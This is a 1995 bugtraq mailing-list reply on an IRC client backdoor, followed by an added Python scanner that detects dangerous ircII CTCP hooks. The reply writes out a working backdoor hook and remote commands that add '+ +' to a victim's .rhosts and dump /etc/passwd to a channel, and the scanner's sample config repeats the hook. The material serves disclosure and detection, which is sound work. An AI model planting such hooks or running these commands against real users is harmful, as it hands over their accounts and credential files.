[893] in bugtraq
Re: IRC Security Loophole
daemon@ATHENA.MIT.EDU (Kernel Panic)
Fri Feb 3 22:34:34 1995
Date: Fri, 3 Feb 1995 18:30:53 -0800 (PST)
From: Kernel Panic <lwells@netcom.com>
To: Silicon Avatar <zitz@infinity.ivdev.com>
Cc: bugtraq@fc.net
In-Reply-To: <Pine.LNX.3.91.950203181914.147A-100000@infinity.ivdev.com>
On Fri, 3 Feb 1995, Silicon Avatar wrote:
> On Fri, 3 Feb 1995, Lorna Leong wrote:
>
> >
> > Hi,
> >
> > I read somewhere that there is a security loophole in IRC. I don't know
> > anything else about it but I would like to find out more information
> > about this. I heard that information about this IRC loophole can be found
> > by FTP at ftp.cert.org, but I couldn't find anything relevant there.
>
> If you are talking about the "jupe" or "grok" hole, it was temporary, and
> merely a hacked version of the client floating around at "trusted" sites.
>
> To my knowledge, these "hacks" have been removed and are no longer a threat
> (unless someone is propagating these older clients.)
>
> Simply put, you could "CTCP grok [command]" (CTCP being a method of
> communication over IRC) someone, and have that command executed,
> unknowingly, off the account.
No, IRC holes are a more serious threat than you give them credit for.
For example, if I were to add to a script (or better yet make someone
type) the following:
/on ^ctcp "% % JUPE" $3-
They would be just as much in my control as if they were on a hacked client.
From this, you can do:
/ctcp <nick> JUPE /exec echo + + >> $HOME/.rhosts
or
/ctcp <nick> JUPE /red #<channel> /exec cat /etc/passwd
There's more to IRC backdoors than making people say stupid stuff on a
channel. I hope this example clears that up a little.
/dev/kmem
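The backdoor in the reply above works because the hook action is the remote-supplied tail of the CTCP message. The following is an added example, not code from the original thread or from any IRC client: a heuristic scanner for ircII script files (e.g. a user's .ircrc) that flags CTCP hooks which hand remote text to a command interpreter. The hook syntax assumed is `/on [^]ctcp "<pattern>" <action>`, with `$0` the sender, `$1` the target, `$2` the CTCP keyword and `$3-` everything after it; the sample config is constructed.

```python
import re

# ircII CTCP hook line: /on [^]ctcp "<pattern>" <action>
HOOK_RE = re.compile(
    r'^\s*/?on\s+\^?ctcp\s+"(?P<pattern>[^"]*)"\s+(?P<action>\S.*)$',
    re.IGNORECASE)
# "$3-" style expansion: the rest of the CTCP line, chosen by whoever sent it.
TAIL_RE = re.compile(r'\$(\d+)-')
# Client commands that turn their argument into shell input or client commands.
INTERPRETERS = re.compile(r'(?:^|[\s/{;])(exec|eval|sendline)\b', re.IGNORECASE)


def classify_hook(line):
    """Return (severity, reason) for a CTCP hook line, or None if not a hook."""
    m = HOOK_RE.match(line)
    if not m:
        return None
    action = m.group('action').strip()
    if TAIL_RE.match(action):
        # The action *is* the remote text: everything after the CTCP keyword
        # runs as a client command (the /on ^ctcp "% % JUPE" $3- backdoor).
        return ('critical', 'CTCP body executed verbatim as client command')
    if INTERPRETERS.search(action) and TAIL_RE.search(action):
        return ('high', 'remote CTCP text passed to exec/eval')
    if TAIL_RE.search(action):
        return ('low', 'remote CTCP text expanded in hook action')
    return ('info', 'CTCP hook without remote text expansion')


def scan_script(text):
    """Scan an ircII script; return [(lineno, severity, reason, line)] for flagged hooks."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        result = classify_hook(line)
        if result and result[0] != 'info':
            findings.append((n, result[0], result[1], line.strip()))
    return findings


# Constructed sample .ircrc fragment: benign hooks beside two backdoor variants.
SAMPLE_IRCRC = """\
# constructed sample, not a real config
set NOVICE off
on ^ctcp "% % VERSION" ctcp $0 VERSION ircII
on ^ctcp "% % JUPE" $3-
on ^ctcp "% % RUN" exec $3-
on ^ctcp "% % PING" ctcp $0 PING $3-
"""

if __name__ == '__main__':
    for n, sev, why, line in scan_script(SAMPLE_IRCRC):
        print(f"line {n}: {sev}: {why}: {line}")
```

The 'low' finding on the PING hook is the normal echo reply; the scanner reports any remote-text expansion so a reviewer can decide, but only the verbatim and exec/eval cases indicate a backdoor.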